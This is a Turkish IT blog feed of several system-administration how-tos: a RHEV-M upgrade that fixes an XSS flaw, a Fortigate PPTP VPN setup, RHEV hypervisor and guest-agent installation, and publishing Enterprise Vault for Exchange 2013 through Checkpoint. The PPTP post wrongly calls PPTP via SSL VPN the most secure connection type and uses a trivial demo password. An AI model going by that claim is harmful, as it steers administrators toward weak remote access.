Dün itibari ile raporladığım zafiyet için bugfix  yayınlandı, RHEV-M kullanıcılarının zafiyetten etkilenmemeleri için bu bugfix update işlemini gerçekleştirmeleri gerekmekte.

 

Öncelikle sistemimizin tamamı ile güncel olmasında fayda var, (yum -y upgrade)

 

Sistem güncellemelerinde kernel update var ise sistemi reboot  edelim.

 

Sistemi güncellemesinden sonra sıra RHEV Manager uygulamasını upgrade ederek cross site script zafiyetinden kurtulmaya geldi.

 

Güncellenecek paketleri görmek isterseniz rhevm-check-update komutunu kullanabilirsiniz.

 

[root@rhevm ~]# rhevm-check-update

 

Checking for updates… (This may take several minutes)…[ DONE ]


20 Updates available:


* rhevm-3.2.2-0.41.el6ev.noarch
* rhevm-3.2.3-0.42.el6ev.noarch
* rhevm-backend-3.2.2-0.41.el6ev.noarch
* rhevm-backend-3.2.3-0.42.el6ev.noarch
* rhevm-config-3.2.2-0.41.el6ev.noarch
* rhevm-config-3.2.3-0.42.el6ev.noarch
* rhevm-dbscripts-3.2.2-0.41.el6ev.noarch
* rhevm-dbscripts-3.2.3-0.42.el6ev.noarch
* rhevm-genericapi-3.2.2-0.41.el6ev.noarch
* rhevm-genericapi-3.2.3-0.42.el6ev.noarch
* rhevm-notification-service-3.2.2-0.41.el6ev.noarch
* rhevm-notification-service-3.2.3-0.42.el6ev.noarch
* rhevm-restapi-3.2.2-0.41.el6ev.noarch
* rhevm-restapi-3.2.3-0.42.el6ev.noarch
* rhevm-tools-common-3.2.2-0.41.el6ev.noarch
* rhevm-tools-common-3.2.3-0.42.el6ev.noarch
* rhevm-userportal-3.2.2-0.41.el6ev.noarch
* rhevm-userportal-3.2.3-0.42.el6ev.noarch
* rhevm-webadmin-portal-3.2.2-0.41.el6ev.noarch
* rhevm-webadmin-portal-3.2.3-0.42.el6ev.noarch
Starting ovirt-engine service…                     [ DONE ]

 

 

 

Bug fix için yukarıda vermiş olduğum linkteki paketlerinde arasında bulunduğu bir takım upgrade paketleri var. Upgrade işlemine başlayabiliriz.

 

  [root@rhevm ~]# rhevm-upgrade

 

Checking for updates… (This may take several minutes)…[ DONE ]


20 Updates available:
* rhevm-3.2.2-0.41.el6ev.noarch
* rhevm-3.2.3-0.42.el6ev.noarch
* rhevm-backend-3.2.2-0.41.el6ev.noarch
* rhevm-backend-3.2.3-0.42.el6ev.noarch
* rhevm-config-3.2.2-0.41.el6ev.noarch
* rhevm-config-3.2.3-0.42.el6ev.noarch
* rhevm-dbscripts-3.2.2-0.41.el6ev.noarch
* rhevm-dbscripts-3.2.3-0.42.el6ev.noarch
* rhevm-genericapi-3.2.2-0.41.el6ev.noarch
* rhevm-genericapi-3.2.3-0.42.el6ev.noarch
* rhevm-notification-service-3.2.2-0.41.el6ev.noarch
* rhevm-notification-service-3.2.3-0.42.el6ev.noarch
* rhevm-restapi-3.2.2-0.41.el6ev.noarch
* rhevm-restapi-3.2.3-0.42.el6ev.noarch
* rhevm-tools-common-3.2.2-0.41.el6ev.noarch
* rhevm-tools-common-3.2.3-0.42.el6ev.noarch
* rhevm-userportal-3.2.2-0.41.el6ev.noarch
* rhevm-userportal-3.2.3-0.42.el6ev.noarch
* rhevm-webadmin-portal-3.2.2-0.41.el6ev.noarch
* rhevm-webadmin-portal-3.2.3-0.42.el6ev.noarch

 

During the upgrade process, RHEV Manager  will not be accessible.


All existing running virtual machines will continue but you will not be able to


start or stop any new virtual machines during the process.

 

Would you like to proceed? (yes|no): yes
Stopping ovirt-engine service…                     [ DONE ]
Stopping DB related services…                      [ DONE ]
Cleaning async tasks…                              [ DONE ]
Pre-upgrade validations…                           [ DONE ]
Backing Up Database…                               [ DONE ]
Rename Database…                                   [ DONE ]
Updating rpms…                                     [ DONE ]
Updating Database…                                 [ DONE ]
Restore Database name…                             [ DONE ]
Preparing CA…                                      [ DONE ]
Running post install configuration…                [ DONE ]
Starting ovirt-engine service…                     [ DONE ]
Starting DB related services…                      [ DONE ]

 

RHEV Manager upgrade completed successfully!

 

* Upgrade log available at /var/log/ovirt-engine/ovirt-engine-upgrade_2013_09_11_16_03_40.log
* Perform the following steps to upgrade the history service or the reporting package:


1. Execute: yum update rhevm-reports*
2. Execute: rhevm-dwh-setup
3. Execute: rhevm-reports-setup
* DB Backup available at  /var/lib/ovirt-engine/backups/ovirt-engine_db_backup_2013_09_11_16_03_43.sql
[root@rhevm ~]# yum update rhevm-reports*
Loaded plugins: product-id, rhnplugin, security, subscription-manager, versionlock
This system is not registered to Red Hat Subscription Management. You can use subscription-manager to register.
This system is receiving updates from RHN Classic or RHN Satellite.
Setting up Update Process
No Packages marked for Update
[root@rhevm ~]# rhevm-dwh-setup
In order to proceed the installer must stop the ovirt-engine service
Would you like to stop the ovirt-engine service? (yes|no): yes
Stopping ovirt-engine…                              [ DONE ]
Setting DB connectivity…                            [ DONE ]
Upgrade DB…                                         [ DONE ]
Starting ovirt-engine…                              [ DONE ]
Starting oVirt-ETL…                                 [ DONE ]
Successfully installed rhevm-dwh.
The installation log file is available at: /var/log/ovirt-engine/rhevm-dwh-setup-2013_09_11_16_33_08.log
[root@rhevm ~]# rhevm-reports-setup
Welcome to ovirt-engine-reports setup utility
In order to proceed the installer must stop the ovirt-engine service
Would you like to stop the ovirt-engine service? (yes|no): yes
Stopping ovirt-engine…                              [ DONE ]
Editing XML files…                                  [ DONE ]
Setting DB connectivity…                            [ DONE ]
Backing up Installation…                            [ DONE ]
Backing up reports DB…                              [ DONE ]
Exporting adhoc reports…                            [ DONE ]
Exporting scheduled reports…                        [ DONE ]
Exporting current users…                            [ DONE ]
Deploying Server…                                   [ DONE ]
Updating Redirect Servlet…                          [ DONE ]
Importing current users…                            [ DONE ]
Importing adhoc reports…                            [ DONE ]
Importing reports…                                  [ DONE ]
Importing current users…                            [ DONE ]
Customizing Server…                                 [ DONE ]
Importing scheduled reports…                        [ DONE ]
Running post setup steps…                           [ DONE ]
Starting ovirt-engine…                              [ DONE ]
Succesfully installed ovirt-engine-reports.


The installation log file is available at: /var/log/ovirt-engine/ovirt-engine-reports-setup-2013_09_11_16_34_02.log


[root@rhevm ~]#

 

Upgrade işlemi sonrasında RHEV manager daki zafiyet sonlanmış oluyor.

 

Güvenliğiniz için hızlı aksiyonlar almanızı tavsiye ederim.

 

RHEV ile güvenli ve mutlu günler.

 

RHEV konusundaki gereksinimleri ve alt yapıyı bana sağlayan ENDERSYS A.Ş. ve Ömer Faruk ŞEN’ e teşekkürü borç bilirim.

Fortigate Firewall PPTP VPN Yapılandırılması

$
0
0

Şirketler çeşitli ihtiyaçlarından dolayı, şubelerini birbirleriyle yada çalışanlarını şubelerine farklı lokasyonlardan erişimini sağlamak isterler. Bunu yaparken her bağlantı kendi içinde bir güvenlik tehdidi oluşturur. Bilinen en güvenli bağlantı tipi olan SSL VPN( Sana özel ağ) üzerinden pptp bağlantısını inceleyeceğiz.

 

Bu bağlantı fortigate 80c üzerinde yapacağız. Ürünün firmware versiyonu  v5.0,build0208(GA Patch 3)

 

Bu makalemde PPTN ile Fortigate firewall üzerinden bir lokasyona erişimi anlatacağım.

 

Yapımız aşağıda ki gibi,

 

clip_image002

 

Bir adet Akıllı telefon (PPTP VPN destekli) ve bir adet normal bilgisayar üzerinde bağlantıları yapacağız.

 

Firewall ayarları ile başlıyoruz.

 

 

 

clip_image004

 

İlk olarak Fortigate üzerinde PPTP yapacak olan kullanıcı   tanımlarını yapıyoruz.

 

Karşımıza gelen ekrandan User Definitionà Create New diyerek devam ediyorum

clip_image006

 

 

Kullanıcımız pptp_elif olarak tanımlıyorum.

 

clip_image008

 

PPTP VPN yapacak userlar için bir grup oluşturmamız gerekiyor bunun için;

 

Aynı Ekrandan User Groupà Create New diyerek devam ediyorum.

 

clip_image010

 

Karşımıza gelen ekranda Group ismini vererek üye yapabileceğim kullanıcılardan (daha önce oluşturduğum ve gruba üye olmayan) pptp_elif kullanıcısını bu gruba member yapıyorum.

 

clip_image012

 

 

Bu işlemleri yaptıktan sonra, PPTP ile bağlanacak olan kullanıcılar local networkten farklı bir ip aralığını almasını istiyorum. Bunun için gerekli tanımlamayı yapıyorum.

 

Firewall ObjectsàAdressàCreate New

 

Ben burada pptp_range adında bir aralık tanımlıyorum. Bağlanacak kişi sayısına göre aralık belirleyebilirsiniz, ben en fazla 10 kişi olabilecek şekilde ayarlıyorum.

 

clip_image014

 

 

PPTP kullanıcılarının local networke erişmelerini istiyorum, bunun için local networkumude tanıtıyorum, local networlu subnet olarak tanıtacağım,

 

Firewall ObjectsàAdressàCreate New

 

clip_image016

 

 

 

Bu işlemlerden sonra komut satırından bir takım PPTP VPN ayarları yapmamız gerekiyor,

 

Ben komut satırına putty programı ile bağlanacağım. Bağlantı türüm SSH olacak.

 

clip_image018

 

Username ve password girerek sisteme login oldum.

 

clip_image020

 

Login olduktan sonra sırasıyla aşağıdaki işlemleri yapıyorum.

 

-          config vpn pptp                               - enter,                                (config moda giriş)

-          set status disable            - enter               

-          set status enable            - enter

-          set ?                                     - enter                 (set ile yapılabilecekler listesi)

-          set sip 172.16.16.10        - enter                 (PPTP başlangıç ip si)

-          set eip 172.16.16.20       - enter                 (PPTP bitiş ip si)

-          set usrgrp pptp_vpn     - enter                 (PPTP için tanımlanan grup)

-          Show                                   - enter                 (yapılan ayarlar kontrol ediliri)

-          End                                       - enter                 (komutu ile işleme son verilir, kaydedilir)

 

 

Bu işlemi yaptıktan sonra artık Policy (Kural) yazmaya başlıyoruz. İlk olarak PPTP kullanıcılarının local networke erişimi için gerekli kural yazılır.

 

clip_image022

 

Yazdığımız kuralımız aşağıdaki gibi,

clip_image024

 

Artık Windows olan bir cliet ile testimize başlayalım,

 

Network and sharing Center ekranında à Set up a new connection or network diyerek ilerliyoruz.

 

clip_image026

 

Karşımıza gelen ekrandan, VPN yapacağımzıı belirterek Next diyerek ilerliyoruz.

              

clip_image028

 

Mevcutları kullanmadan, yeni oluşturacağımız için, No create new connection seçerek nexy diyoruz.

 

clip_image030

 

İnternet bağlantısı ile vpn seçeneğini seçerek nex ile devam ediyorum.

 

clip_image032

 

Bu ekranda WAN ip adresini ve bağlantımıza bir isim vererek create diyerek bir vpn bağlantısı oluşturuyoruz.

clip_image034

 

Ben Windows 8 kullanıyorum, network ekranıma PPTP_Test bağlantım geldi.

 

clip_image036

 

Connect diyerek authentication ekranına gidiyorum.

Connect dedikten sonra, Fortigate üzerinde oluşturduğum userın kullanıcı adı ve şifresini gireceğim ekran geliyor.

 

clip_image038

 

Oluşturduğum şekilde;

 

Username          : pptp_elif

Password            : elifelif                olacak şekilde bilgileri girerek ok diyorum.

 

 

Bu işlemden sonraki aşağıda görüldüğü üzere PPTP_Test bağlantısı connect oldu.

 

clip_image040

 

Şimdi bu bağlantının özelliklerine giderek aldığı ip adresini kontrol ediyorum. Pptp_range aralığından ip aldığını check ediyorum.

clip_image042

 

Şimdi local networküme ping atarak yazdığım policy mi test ediyorum.

 

Pptp ip aralığı olan 172.16.16.0 networkunden local network olan 192.168.10.0 başarılı bir şekilde ping işlemini gerçekleştirdik.

 

clip_image044

 

 

Tüm bu işlemleri yaptığımızda PPTP VPN ile bağlantı kuran kullanıcı internete çıkamayacaktır. Çünkü bağlantıdan sonra internete nasıl çıkacağıyla alakalı henüz bir kural yazmadık,

 

PPTP VPN başarılı bir şekilde kurulduktan sonra internet erişimi için ilgili policy yazalım. Policy ekranına nasıl geleceğimizi artık bildiğimiz için tekrarlamıyorum, direk policy yazıyorum.

 

clip_image046

 

Bu kuralımızı yazdıktan sonra, pptp vpn ile bağlanan kullanıcı internet çıkacaktır.

 

Eğer internet bağlantısını sağladık, fakat pptp vpn ile kullanıcı sadece ip aldığı için DNS olmadığı için isim çözemeyecektir. Eğer bunun da olmasını istiyorsak aşağıdaki adımları yerine getirmeliyiz.

 

Network and Sharing Center açıyoruz,

PPTP_Test bağlantısına çift tıklayarak,

Properties

Networking,

İnternet protocol version 4 (TCP/IP4)

Properties

Açılan ekran “use the following DNS server addresses” seçerek

Kullanmasını istediğimiz dns serverları manuel girebiliriz.

clip_image048

 

 

Windows tarafında tüm ayarları yaptık. Sorunsuz çalıştığını test ettik.

 

Şimdi mobile cihaz olarak Samsung Galaxy Note II cihazından android üzerinden PPTP VPN test edeceğiz.

 

Android versiyonu 4.1.2

 

İlk olarak ayarlara gidiyoruz.

 

clip_image050

 

Karşımıza gelen ekrandan diğer ayarları seçiyoruz.

 

clip_image052

 

 

Karşımıza gelen ekrandan , VPN seçerek devam ediyoruz.

 

clip_image054

 

 

Vpn ekranından , Vpn ağı ekle diyerek devam ediyorum.

 

clip_image056

 

Aşağıdaki bilgileri doldurarak devam edeceğiz, burada dikkat etmemiz gereken husus,  DNS ayarlarına giriyoruz ki bağlantıdan sonra internet tarafında sorun yaşamamak için.

clip_image058

 

Bağlantımız PPTP VPN için artık hazır, Bağlan diyerek ilerliyoruz.

 

clip_image060

 

Bağlantımız android mobile cihazı üzerinde de başarılı bir şekilde kuruldu.

 

clip_image062

 

Local networke vs. erişimi daha önce Windows tarafında kontrol etmiştik. Bu nedenden dolayı burada tekrarlamıyorum.

 

Makalemiz sonuna geldik, umarım faydalı bir makale olmuştur. Bir başka makalede görüşmek üzere.

RHEV 3.2 Hypervisor Kurulum ve Guest Agent Kurulumu

$
0
0

Bundan önceki makalemde RHEV yani “Redhat Enterprise Virtualization” hakkında temel bilgilendirme ve kurulum adımlarını anlatmıştım. Bu makaleye aşağıdaki link üzerinden erişebilirsiniz.

 

http://www.cozumpark.com/blogs/gvenlik/archive/2013/09/22/rhev-manager-3-2-kurulum-ve-cross-site-script-xss-zafiyeti-ve-bugfix-update.aspx

 

Bu makalemde sie Hypervisor ve guest agent kurulumlarından bahsedeceğim.

 

Kuruluma başlamadan önce gereksinimlere göz atalım.

1- Donanım Gereksinimleri:

1.1 – Red Hat Enterprise Virtualization Hypervisor CPU :

  • AMD Opteron G1
  • AMD Opteron G2
  • AMD Opteron G3
  • AMD Opteron G4
  • AMD Opteron G5
  • Intel Conroe
  • Intel Penryn
  • Intel Nehalem
  • Intel Westmere
  • Intel Sandybridge
  • Intel Haswell

Tüm Intel64 ve AMD64 işlemcileri destekler, AMD işlemciler için AMD-V, Intel işlemcileri için Intel-VT olmalıdır.

Ayrıca “No Execute(NX)” bayrağı gereklidir.

 1.2 – Red Hat Enterprise Virtualization Hypervisor RAM :

Hypervisor başına en az 2 GB ram önerilir ancak bu durum kullanıcak sanal sunucu sayısına göre değişiklik göstermektedir.

RHEV Hypervisor maximum 2 TB ram desteklemektedir.

  1.3 – Red Hat Enterprise Virtualization  Hypervisor Storage :

Storage gereksinimi kurulacak sistemlerin büyüklüğüne göre farklılık gösterirken hypervisor başına en az 2 GB gerektirmektedir.

 Red Hat Enterprise Virtualization Hypervisor Swap :

8 GB ram olduğunu düşünürsek, hesaplaması şu şekildedir.

(8*0,5) +4 = 8 GB Swap

 1.4 – Red Hat Enterprise Virtualization Hypervisor Network Kartı :

En az 1 adet 1 Gbps network kartı gerekmektedir ancak 2 adet 1 Gbps network kartının kullanılması hostlar arası sanal makine migrate de performans sağlayacaktır, bu nedenle 2 adet 1 Gbps network kartı kullanmanız önerilir.

 2- Red Hat Enterprise Virtualization Yazılım Gereksinimleri :

2.1 – İşletim Sistemi :

Red Hat Enterprise Virtualization Hypervisor için ISO dosyası access.redhat.com daki download bölümünden indirebilirsiniz.

Not: Bunu indirebilmek için yetkili olmanız gerekir.

clip_image002

 

 

3 – Red Hat Enterprise Virtualization Hypervisor Kurulum

3.1 – Hypervisor makinemize indirmiş olduğumuz ISO dosyasını import ederek, boot ediyoruz.

clip_image004

 

 

 

3.2 – Install or Upgrade seçeneği ile devam ediyoruz.

clip_image006

 

 

3.3 – Klavye seçimini gerçekleştiriyoruz.

Keyboard Layout Selection

| Swiss German (latin1) |
| Slovak (qwerty) |
| Slovenian |
| Serbian |
| Serbian (latin) |
| Swedish |
| Turkish |
| Ukrainian |
| United Kingdom |
| *** U.S. English ******************* |

<Apply> <Reset>

 

3.4 – Disk yapılandırması

Disk yapılandırma bölümünde sisteme bağlı bulunan tüm diskler otomatik olarak görüntülenir.

Disk yapılandırması ile ilgili detaylı bilgi için tıklayın.

3.4.1 – Boot Diski seçilir :

İlk bölümde boot diski seçilmelidir, bu bölümeMBR(Master boot record) kurulur.

clip_image008

 

 

3.4.2 – Install disk :

Bu bölümde Hypervisor için kurulum yapılacak işletim sistemi dosyalarının bulunacağı disk seçilir.

 3.5 – Admin kullanıcısı için şifre belirliyoruz.

Bu bölümde Hypervisor sunucuya giriş yapabileceğimiz admin kullanıcısı için şifre belirliyoruz ve “install” diyerek değişikliklerin diske yazılmasını sağlıyoruz, işlem bittiğinde reboot isteyecektir, reboot edebiliriz.

Hypervisor kurulum işlemini tamamladı, 4. bölümde hypervisor için temel yapılandırma ayarlarına göz atıyor olacağız.

4 – Red Hat Enterprise Virtualization Hypervisor Yapılandırılması :

4.1 – Login

Please login as 'admin' to configure the node

localhost login:

Username : admin

Password : kurulum esnasında belirlemiş olduğumuz password ile giriş yapabilirsiniz.

4.2 – Hostname, DNS Server, NTP Server ve Network Yapılandırması

Tab tuşu ile seçenekler arasında geçiş yapabilirsiniz. Network kartını seçerek “enter” tuşuna basın, network kartınızı yapılandırın.(IP adres, Netmask, Gateway, Vlan ID)

clip_image010

 

 

clip_image012

 

 

4.3 – Uzaktan erişim ve Admin şifre resetleme :

Bu bölümde isterseniz hypervisor makine için ssh servisini start edebilir, isterseniz admin şifresini resetleyebilirsiniz.

clip_image014

 

 

Not : Hypervisor sunucuya default da ssh dan erişim yoktur, sadece ara yüz ile erişim sağlayabilirsiniz. Arabyüzden login işlemlerinde “root” userı kullanılmaz. SSH erişimi için ara yüzden ssh servisini enable etmeniz gerekir.

4.4 – Keyboard

Kurulum sırasında keyboard ayarlarımızı seçmiştik, bu nedenle burada bir değişiklik yapmamıza gerek yok.

4.5 – SNMP

SNMP ile sunucumuzu izlemek istersek bu bölümü yapılandırabiliriz. Tab tuşu ile seçenekler arasında geçiş yapabilirsiniz, space tuşu ile “Enable SNMP” seçeneğini aktif edebilirsiniz.


SNMP
[ ] Enable SNMP

SNMP Password
Password: _______________
Confirm Password: _______________

<Apply> <Reset>


4.6 –Logging

  • Logrotate Yapılandırması : Dosya boyutu belirtile boyuta geldiğinde log rotate işlemini gerçekleştirir.
  • Rsyslog Yapılandırması : Log dosyalarını uzaktaki sunucuya göndermek için kullanılır.
  • NetConsole Yapılandırması : Kernel mesajlarını uzak sunucuya göndermek için kullanılır.

 4.7 – Kernel Dump

Bu özellik hypervisor makinenin crash olması v.b. durumlarda kernel mesajlarını uzaktaki bir sunucuya göndermek için kullanılır. SSH ve NFS servisleri aracılığı ile bunu gerçekleştirebilir.

 4.8. – Remote Store

Hypervisor ISCSI storage destekler, ihtiyaç duyulması durumunda bu bölümden ilgili ayarlar yapılabilir.

 4.9 – CIM (Common Information Model)

CIM(Common Information Model) servis enable edilir ise sanal makinelerinizi izleyebilirsiniz. (monitoring)

CIM Configuration

[ ] Enable CIM

 

CIM Access

Password:         ______________

Confirm Password: ______________

 

   <Apply>    <Reset>

 

4.10 – RHEV-M

Bu bölümde Hypervisor makine manager uygulamasına register edilir. Manager Server IP adresi ve şifre bilgileri ile bu işlem gerçekleştirilir.

clip_image016


4.11 – Plugins

Bu bölümde Hypervisor deki kurulu Plugins listesi görüntülenir.

 4.12 – Red hat Network

Bu bölüm den RHN(Redhat Network) veya RHN Satellite Server register işlemi gerçekleştirilir. RHN erişim bilgisi olan username ve password bilgisine ihtiyaç duyur. Proxy v.b. erişim bilgileri bu bölümde düzenlenebilmektedir.

clip_image018

 

Agent kurulumu:

RHEV hypervisor üzerinde çalışan sanal makineler RHEV Manager uygulaması aracılığı ile yönetilebilmekte.

RHEV in sanallaştırma çözümünü kullanan sanallaştırma yöneticileri zaman zaman manager aracılığı ile  IP adresi, hostname v.b. gibi bilgiler ile sanal makine aramaları gerekebiliyor.

Bu gibi durumlarda sanal makinelerde guest agent kurulu değil ise RHEV manager arayüzünden IP adresi, hostname gibi bilgileri ile arama sonucu elde edebilmek mümkün olmuyor, ayrıca hostların sanal makineleri daha iyi yönetebilmesi, performans elde edilebilmesi için  guest agent kurulması gerekiyor.

Bu durumu VMware deki VMware Tools kurulumu gibi düşünebilirsiniz, hatta gibi değil ta kendisidir aslında.

RHEV deki guest agentın ne işe yaradığına kısaca göz attıktan sonar guest agent kurulum işlemine geçebiliriz.

 

1-Linux için RHEV Guest :

1.1- İhtiyaç duyulan Channel aktif edilir :

Redhat işletim sistemleri RHN dediğimiz Redhat Network register edilir, buraya register edilmez ise update çekemez, yum ile paket kurulumu yapamaz. Biz yum ile paket kurulumu gerçekleştireceğimiz için makinemizi register ediyoruz ve Agent paketlerinin bulunduğu channel ekliyoruz.

RHEL 6 için channel adı : rhel-x86_64-rhev-agent-6-server

RHEL 5 için channel adı : rhel-x86_64-rhev-agent-5-server

1.2- RHEV 3.0 için RHEV Agent kurulumu :

# yum install rhev-agent

# service rhev-agentd start

# chkconfig rhev-agentd on

1.3- RHEV 3.1 ve 3.2 için RHEV Agent kurulumu :

# yum install rhevm-guest-agent

# /etc/init.d/ovirt-guest-agent start

# chkconfig ovirt-guest-agent on

 

 

2- Windows için RHEV Guest :

2.1- ISO Mount :

RHEV manager kurulumunda ISO domain olarak adlandırılan bir disk bölümü seçilir, bu bölüm içerisine default da RHEV ile ilgili ISO dosyaları gelir, bizde OS için ISO dosyaları ekleyebiliriz bu alana.

2.2- RHEV Guest Tools kurulumu:

Default kurulum sonrasında ISO domain içerisinde rhev-guest-tools.iso adında bir ISO dosyası gelir, bu ISO dosyası sanal windows makineye mount edilerek kurulum yapılabilir.

NOT : RHEV manager ISO domain bölümünde  rhev-guest-tools.iso ISO dosyası yok ise aşağıdaki RHEV manager makinesin de root yetkisine sahip bir user ile

# yum install rhev-guest-tools-iso

Komutu çalıştırılarak ilgili ISO dosyasının ISO domain içerisinde yer alması sağlanır.

Not: Bu doküman yazılırken RHEV Installation Guide dan faydalanılmıştır.

Exchange Server 2013’ e hizmet veren Symantec Enterprise Vault’ un Checkpoint R76 Üzerinden Publish Edilmesi

$
0
0

Merhaba, bu makalemde sizlere Exchange Server 2013’ün arşivlemesini yapan Symantec Enterprise Vault’un Checkpoint R76 ile dış dünyaya hizmet vermesinin sağlanmasından bahsetmek istiyorum.

Çalışmamı üç başlık altında topladım.

Exchange Server 2013 tarafında yapılması gerekenler

Checkpoint tarafında yapılması gerekenler

Enterprise Vault tarafında yapılması gerekenler

Exchange Server 2013’e dair

Malumunuz geçen yılsonunda yayınlandı ve yılbaşında Exchange 2010’a getirilen SP3 ile transition yapılabilir hale geldi. Şu anki Cumulative Update 2 sürümü de tam bir sürüm olup doğrudan kurulabilir haldedir.

Mimari, 2010 sürümüne göre değişti ve server role’leri CAS ve Mailbox başlıkları altında toplandı.

Exchange yapınızın dış dünyadan ve/veya şirket ağından, Outlook kullanıcılarına, Outlook Web App kullanıcılarına ve/veya ActiveSync kullanıcılarına hizmet vermesi için Client Access Server rolü hizmet vermektedir. Dolayısıyla Client Access için sunucunun yapılandırılması gerekir. External Client Access için Outlook Anywhere yapılandırması, AutoDiscovery yapılandırması ( name resolution ) , güvenilir bir sertifika otoritesinden alınmış SSL sertifikası ( test için internal CA’de kullanılabilir) gerekir. Internal Client Access’in sağlamamasında bir zorluk olmadığından bahsetmiyorum. Gereksinimlerin yapılandırılmasını ekran görüntüleri ile açıklayayım.

Exchange Management Console yerini Exchange Admin Center’a bıraktığından, yeni yönetim panelini https://server_name_or_server_fqdn/ecp ile açıyoruz.

clip_image002

Outlook Anywhere, yeni nesil Exchange Server Client Access mimarisinde “olmazsa olmaz” olarak görünüyor. Dolayısıyla sadece internal client access olacaksa da outlook anywhere yapılandırmasını tamamlamanızda fayda var!

Yapılandırma için Exchange Admin Center’da ( kısa EAC ) servers kısmı kullanılıyor. EMS’de kullanılabilir.

clip_image004

Her iki rolü ayrı ayrı ele almak için birer adet sunucu kurmuştum test ortamıma. Siz tek bir sunucu ile de çalışabilirsiniz. Sunucu rolleriniz ayrı ayrı ise, muhatabınız Client Access Role’ü yüklü olan sunucu olacaktır.

External Host Name belirlenmesi gerekir! External Host name’in isim çözümlemesi açısında DNS yapınızda uygun bir (A) record’a sahip olması gerekir!

Outlook Anywhere’in ve SSL bağlantısını kullanacak diğer client access bileşenlerinin çalışması için ( test ortamları dışında da uyarı vermemesi için) Exchange Server CAS sunucunuza, güvenildik bir otoriteden sertifika alınması gerekir. Sertifika işlemlerini EAC’den aşağıdaki kısımdan yapabilirsiniz.

 

clip_image006

Sunucu sayınız birden fazla ise, üstteki resimde görülen drop-down menüden, üzerinde işlem yapacağınız sunucunun seçilmesi gerekir!

Checkpoint Firewall’a(R76) dair

Kullanıcılar arşivlerine erişmek istediklerinde (Outlook Web App’ten yada Outlook’tan ) Exchange Server 2013 ile Symantec Enterprise Vault arasındaki bağlantı SSL üzerinden açılma eğilimdedir(Varsayılan durum). Dolayısıyla Checkpoint üzerinde firewall&nat blade’inde SSL bağlantısı için Publish ve/veya Access Rule oluşturulmalıdır.

Tek bir public IP adresiniz varsa, o IP adresine gelen bağlantıları aynı anda iki ayrı kaynağa translate edemeyeceksiniz (Exchange Server CAS servisleri ile Enterprise Vault Web App’i ayrı sunucular üzerinde olacaktır). Checkpoint’in yapısı buna imkan tanımıyor(imkan tanıyan bir ürün var mı derseniz, eskiden ISA/TMG vardı sanıyorum şimdilerde Juniper’de yapıyor, emin değilim ) Bundan dolayı iki adet public IP adresine ihtiyaç var.

Test ortamımdaki Checkpoint topolojimi aşağıda aktarıyorum.

clip_image008

Topolojiden görüldüğü üzere iki adet external interface’e atadığım iki ayrı IP adresini Exchange Server CAS servislerinin yayınlanması için ve Symantec Enterprise Vault’un web servislerinin yayınlanması için kullanacağım.

Exchange Server’ın ve Enterprise Vault’un bulunduğu ip network’ü eth1 ’in arkasındadır.

Publish(yayınlama) için kullanılmak üzere aşağıdaki görüldüğü gibi Node objelerini oluşturunuz.

clip_image010

 

Örnek teşkil etmesi açısında bir node’un detayını aşağıda paylaşıyorum.

clip_image012

 

Bu node üzerinde NAT için “Hide Behind Gateway” , “Static” ya da “Hide Behind IP Address” seçimleri yapmadım! Amaca göre Static NAT da kullanabilirdim.

Port Address Translation’ı ve IP address Translation’ı NAT tablosundan manual olarak yapmayı tercih ettim. Oluşturduğum NAT kuralları aşağıdaki gibidir.

clip_image014

 

Birinci kural, 192.168.1.121 external IP adresine gelen https isteklerini yine https ile Exchange Server CAS’ına gönderiyor. ( owa hizmeri ve autodiscover hizmeti için çalışacak olan kural )

İkinci kural, 192.168.2.121 external IP adresine gelen https isteklerini yine https ile Enterprise Vault’ın web servislerini barındıran sunucuya gönderiyor.( Yani EV’ye gönderiyor, EV web servisleri ne erişim için çalışacak kural )

Enterprise Vault ’a dair

Yazımın ilk kısımlarında, Exchange Server 2013 ile Enterprise Vault arasındaki trafiğin SSL ile kurulma eğiliminde olduğundan bahsetmiştim. Bu duruma istinaden ilk olarak EV web servislerinin kullanabileceği bir SSL sertifikası ( test ortamında Internal CA olabilir ama Production için well-known trusted ca önerilir) tedarik edilmelidir.

clip_image016

“Name” ’ini “Multi_Valued_SAN” olarak yazdığım SSL sertifikasını Default Web Site ile ilişiklendirdim.

Enterprise Vault’un Site özelliklerine bakarak Web Access Application port kullanım durumunu gözleyebilirsiniz.

clip_image018

Outlook’tan yada Outlook Web App’ten Enterprise Vault’a SSL  ile bağlanabilmek için HTTPS kullanımını seçebilirsiniz. Ama zorunlu değilsiniz. Daha önce, Enterprise Vault Default Web Site’ına  SSL sertifikası “bind” ettiğiniz için Internet Information Service SSL bağlantısı kabul edilir durumdadır!

Arşiv’e, Outlook ile yada Outlook Web App ile bağlanacak olan kullanıcılar için bağlantı URL’ini Exchange Policy > Desktop Policy ile yapılandırabilirsiniz.

clip_image020

Outlook 2013 kullanıcıları için arşive erişimi sağlamak adına iki yolunuz mevcut. Dilerseniz herhangi bir add-in/plug-in kurmadan Office Mail App’ı ilgili kullanıcı(lar) için ya da tüm organizasyon için Exchange Management Shell yardımı ile “deploy” edebilirsiniz. Ya da bilindik Outlook add-in’ini ilgili istemci bilgisayarlara kurabilirsiniz.

Outlook Web App ( OWA 2013 diyebiliriz ) ‘ten bağlanacak olanlar için Office Mail App’ini EMS’den kullanıcı mailbox’larına “deploy” etmelisiniz. Bunun yapılandırmasına blog ’umdaki Exchange Server 2013 Arşivleme yazısından yada Enterprise Vault Administrator Guide’ından bakabilirsiniz.

clip_image022

MS Office Outlook ayarları için drop-down menüden outlook’u seçmelisiniz. Dış dünyadan ( şirket network’ü dışından MS Office Outlook ile bağlanacak olanlar) Outlook Anywhere ( rpc over https ) ile ssl bağlantısı kuracaklarından hangi URL’i kullanacaklarının bilgisini, istemci tarafındaki Enterprise Vault Add-In’ine göndermeniz gerekir.  Üstte gösterildiği gibi URL’i “set” edebilirsiniz.

RPC over Http Proxy URL olarak https://vaultexternal.e-vault.info/enterprisevault adresini kullandım.

Dikkat: Eğer Enterprise Vault Default Web Site’ına “bind” ettiğiniz sertifika içinde geçen Subject Name vaultexternal.e-vault.info  isminden farklı ise , istemci tarafında MS Office Outlook’ten arşive erişim sırasında sertifika uyarısı alınır!

Yapılan ayarın geçerli olması için mailbox’ların “Synchronize” edilmesi gerekir.

clip_image024

 

“Sync” işleminden sonra değişiklik istemci tarafında Enterprise Vault add-in’ine gönderildi. Outlook açıldığında ve başarılı şekilde logon olunduktan sonra yansıyacaktır. İstemci tarafına geçerek durumu inceleyelim.

clip_image026

